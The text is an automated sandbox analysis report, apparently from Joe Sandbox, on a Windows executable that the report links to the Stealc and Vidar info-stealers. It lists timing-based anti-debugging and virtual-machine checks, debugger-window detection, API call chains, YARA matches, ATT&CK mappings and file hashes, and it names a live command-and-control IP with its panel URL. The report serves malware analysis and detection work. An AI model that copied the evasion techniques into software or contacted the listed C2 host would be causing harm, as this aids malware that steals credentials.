                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1077FB4 second address: 1077FBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1077528 second address: 107752C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107768D second address: 10776A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8408CC9F90h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10776A6 second address: 10776DA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jp 00007F84086DC786h 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jnl 00007F84086DC786h 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c jmp 00007F84086DC797h 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10776DA second address: 10776EC instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8408CC9F88h 0x00000008 jo 00007F8408CC9F9Dh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1077B03 second address: 1077B26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84086DC795h 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007F84086DC786h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1077B26 second address: 1077B2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1077B2A second address: 1077B30 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1077C9F second address: 1077CB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8408CC9F94h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1077CB9 second address: 1077CC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1077CC0 second address: 1077CC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1077CC9 second address: 1077CCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1077CCD second address: 1077CD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107A489 second address: 107A48E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107A48E second address: 107A498 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8408CC9F92h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107A498 second address: 107A49E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1081FEA second address: 1081FFA instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8408CC9F86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1080374 second address: 1080379 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1080640 second address: 1080646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1080646 second address: 108064A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108064A second address: 108064E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108064E second address: 1080654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: FFE71B instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 101171B instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 108E4E6 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C138B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_00C138B0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C14910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00C14910
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C0DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_00C0DA80
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C0E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_00C0E430
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C14570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_00C14570
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C0ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_00C0ED20
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00C016D0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C13EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00C13EA0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C0F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00C0F6B0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C0BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_00C0BE70
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C0DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00C0DE10
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C01160 GetSystemInfo,ExitProcess, 0_2_00C01160
                Source: file.exe, file.exe, 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1803785871.000000000177E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1803785871.00000000017C3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1803785871.00000000017F6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13533
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13554
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13536
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13547
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13587
                Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe File opened: SICE
                Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C045C0 VirtualProtect ?,00000004,00000100,00000000 0_2_00C045C0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C19860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00C19860
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C19750 mov eax, dword ptr fs:[00000030h] 0_2_00C19750
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C178E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA, 0_2_00C178E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match | File source: Process Memory Space: file.exe PID: 5776, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C19600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
                Source: file.exe, file.exe, 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: i=Program Manager
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C17B90 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C17980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C17850 GetProcessHeap,RtlAllocateHeap,GetUserNameA
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C17A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA

                Stealing of Sensitive Information

                Source: Yara match | File source: 0.2.file.exe.c00000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.1803785871.000000000177E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.1748761507.00000000055E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 5776, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara match | File source: 0.2.file.exe.c00000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.1803785871.000000000177E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.1748761507.00000000055E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 5776, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP
                MITRE ATT&CK Matrix (a leading number is the count of matching signatures for that technique)

                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | 11 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 33 Virtualization/Sandbox Evasion | LSASS Memory | 641 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Disable or Modify Tools | Security Account Manager | 33 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 13 Process Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 4 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 324 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Source | Detection | Scanner | Label
                file.exe | 100% | Avira | TR/Crypt.TPM.Gen
                file.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label
                http://185.215.113.37/ | 100% | URL Reputation | malware
                http://185.215.113.37 | 100% | URL Reputation | malware
                http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
                http://185.215.113.37/e2b1563c6670f193.php% | 17% | Virustotal |
                http://185.215.113.37/rsonation | 17% | Virustotal |
                http://185.215.113.37/k | 17% | Virustotal |
                http://185.215.113.37/e2b1563c6670f193.phpi | 17% | Virustotal |
                No contacted domains info
                Name | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37/ | true | URL Reputation: malware | unknown
                http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37 | file.exe, 00000000.00000002.1803785871.000000000177E000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
                http://185.215.113.37/rsonation | file.exe, 00000000.00000002.1803785871.00000000017DB000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.php% | file.exe, 00000000.00000002.1803785871.00000000017E6000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.phpi | file.exe, 00000000.00000002.1803785871.00000000017C3000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/k | file.exe, 00000000.00000002.1803785871.00000000017DB000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                IP | Domain | Country | ASN | ASN Name | Malicious
                185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1532547
                Start date and time:2024-10-13 16:53:05 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 3m 12s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:1
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:file.exe
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@1/0@0/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 80%
                • Number of executed functions: 18
                • Number of non-executed functions: 85
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Stop behavior analysis, all processes terminated
                • Excluded IPs from analysis (whitelisted): 20.109.210.53, 93.184.221.240
                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, wu.azureedge.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                • Report size getting too big, too many NtQueryValueKey calls found.
                No simulations
                Match | Associated Sample Name / URL | Detection | Threat Name | Context
                185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                No context
                Match | Associated Sample Name / URL | Detection | Threat Name | Context
                WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                No context
                No context
                No created / dropped files found
                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):7.946406803121469
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.96%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:file.exe
                File size:1'844'736 bytes
                MD5:c611a14ca47ba7634683b36724d2b4c8
                SHA1:537c413a3e9060f795510eb8d8659ad5b6de3080
                SHA256:ba6b7db3b9727fd4132bd4e2e6065f0b28c0e21e0bcac29abb2a2d9e0a81425f
                SHA512:ca18a9f6555e9004aa9c654f43a014cd9431535f9018faa573be410e7df3fcf7992c9605648bde26192b7c26ce138a3df517abd5be0db5958b5bece291c71d69
                SSDEEP:49152:T7VWtLekeScyMTzUFOebgQJNp3/eqWhg0yRKM:T0ekoz1LQJXfWhgv
                TLSH:2A8533014C62576BCCBC9AFF077A1E1F37AC1AED361A8406AB1B1F69C513DF1112A89D
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                Icon Hash:90cececece8e8eb0
                Entrypoint:0xa9b000
                Entrypoint Section:.taggant
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:5
                OS Version Minor:1
                File Version Major:5
                File Version Minor:1
                Subsystem Version Major:5
                Subsystem Version Minor:1
                Import Hash:2eabe9054cad5152567f0699947a2c5b
                Instruction
                jmp 00007F840855BFAAh
                Programming Language:
                • [C++] VS2010 build 30319
                • [ASM] VS2010 build 30319
                • [ C ] VS2010 build 30319
                • [ C ] VS2008 SP1 build 30729
                • [IMP] VS2008 SP1 build 30729
                • [LNK] VS2010 build 30319
                Name | Virtual Address | Virtual Size | Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                (unnamed) | 0x1000 | 0x25b000 | 0x22800 | 47c1c2b8cac745fb5127ad36bc89adcc | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                (unnamed) | 0x25e000 | 0x29f000 | 0x200 | 4901c39baa02e9114c0c2aff1937bb20 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                nezugdgl | 0x4fd000 | 0x19d000 | 0x19c400 | 4fd47a658d0f181463b43d6d83398512 | False | 0.9950165109536082 | data | 7.953976955456083 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                ksoeejvz | 0x69a000 | 0x1000 | 0x400 | f85a18f2a909e70f409ef3cac6357a8d | False | 0.7041015625 | data | 5.676065029132145 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .taggant | 0x69b000 | 0x3000 | 0x2200 | 792f4d75b6a75fb0dfc47049f08751d0 | False | 0.006548713235294118 | DOS executable (COM) | 0.019571456231530684 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                DLL | Import
                kernel32.dll | lstrcpy
